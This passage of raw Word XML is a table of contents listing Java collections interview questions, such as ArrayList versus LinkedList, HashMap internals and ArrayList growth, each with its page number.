              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>210</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="257D2CC3" w14:textId="5135EE2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2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ich is more efficient among the ArrayList and LinkedList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307620 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>212</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E2AF98C" w14:textId="0D5D9D0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2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Stream and Collections?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307621 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>214</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61B45F5A" w14:textId="289C274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2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rite a syntax for integer ArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307622 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>216</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FBAE453" w14:textId="32ACCB8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2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can Set not store duplicate values? Explain internal working?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307623 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>217</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FD61BD2" w14:textId="1F25758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2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ich collection you will use in order to remove duplicate elements and preserve the insertion order?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307624 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>218</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73F60EB1" w14:textId="4875D3E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2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ich Collection will you avoid duplicating and store data in a sorted manner?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307625 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>219</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="419EA079" w14:textId="038D761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2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In which scenarios Linked list comes into fixture in HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307626 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>220</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D7F2BAD" w14:textId="3107479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2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ich among ArrayList and LinkedList will be more efficient for random access of data?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307627 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>221</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12BB975E" w14:textId="756D1BB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2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Array, ArrayList and LinkedList? When you will use ArrayList and LinkedList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307628 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>221</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41AAAD04" w14:textId="46D47F0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2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sort the ArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307629 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>223</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BBC5150" w14:textId="545ECF0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3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are the practical use cases of LinkedList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307630 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>226</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12884242" w14:textId="08C0FE3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3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Compare ArrayList objects from the employee and return the highest employee age?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307631 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>229</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10628970" w14:textId="5FBA51D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3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will you find the 3rd last element from the linked list in a single iteration?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307632 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>230</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F3F4EA7" w14:textId="5A11752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3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does ArrayList internally work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307633 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>232</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AB922A7" w14:textId="2854E6E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3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default size of ArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307634 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>234</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B732D2C" w14:textId="102030F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3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increase the size of ArrayList? By how much?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307635 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>234</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C98B5EB" w14:textId="0230405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3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Map and Set?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307636 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>235</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7987D667" w14:textId="78FC995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3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internal working of ArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307637 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>237</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B392C0B" w14:textId="15E40DE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3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does ArrayList increase its size dynamically?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307638 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>238</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B5BA14E" w14:textId="45608F2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3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does ArrayList grow?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307639 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>239</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5547D1D3" w14:textId="4FAC450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4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internal working of ensureCapacity method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307640 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>241</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F49771A" w14:textId="1F74F12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4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do you write a custom ArrayList which will take the input capacity?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307641 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>241</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="006AE60F" w14:textId="1A61DE6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4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ich data structure is used by ArrayList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307642 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>243</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2008771D" w14:textId="30AB640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4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ArrayList and Vector?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307643 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>244</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FCE46B5" w14:textId="6FA2821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4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Best time complexity of Arraylist and Linkedlist? Which is better?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307644 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>245</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
